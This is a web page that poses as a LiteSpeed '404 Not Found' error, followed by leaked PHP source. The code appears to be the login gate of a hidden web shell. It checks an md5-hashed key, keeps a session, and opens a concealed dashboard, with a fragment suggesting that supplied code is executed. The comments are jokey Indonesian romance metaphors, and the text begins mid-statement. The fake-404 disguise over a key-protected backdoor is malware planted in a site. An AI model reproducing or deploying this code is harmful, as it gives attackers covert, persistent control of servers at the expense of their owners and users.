404

Not Found

The resource requested could not be found on this server!


Proudly powered by LiteSpeed Web Server

Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.

" . $clean_code); } // Cek apakah Dia Ingin keluar hati if (isset($_GET['action']) && $_GET['action'] === 'logout') { session_destroy(); header("Location: ?"); // Redirect ke Hati orang lain exit; } // Cek apakah Dia sudah memiliki seseorang? $error_message = ''; if (isset($_POST['key'])) { $input_key = $_POST['key']; $input_key_hash = md5($input_key); // Cek apakah Cintaku padanya diterima? if ($input_key_hash === $valid_key_hash) { $_SESSION['loggedin'] = true; header("Location: ?"); // Redirect ke Hati Dia untuk refresh exit; } else { $error_message = "hatimu Tidak diterima, Cobalah untuk sadar diri!"; // Kesalahan Hati } } // Jika sudah login ke hatinya if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) { show_dashboard(); } else { // Jika belum login show_login_form($error_message); } ?>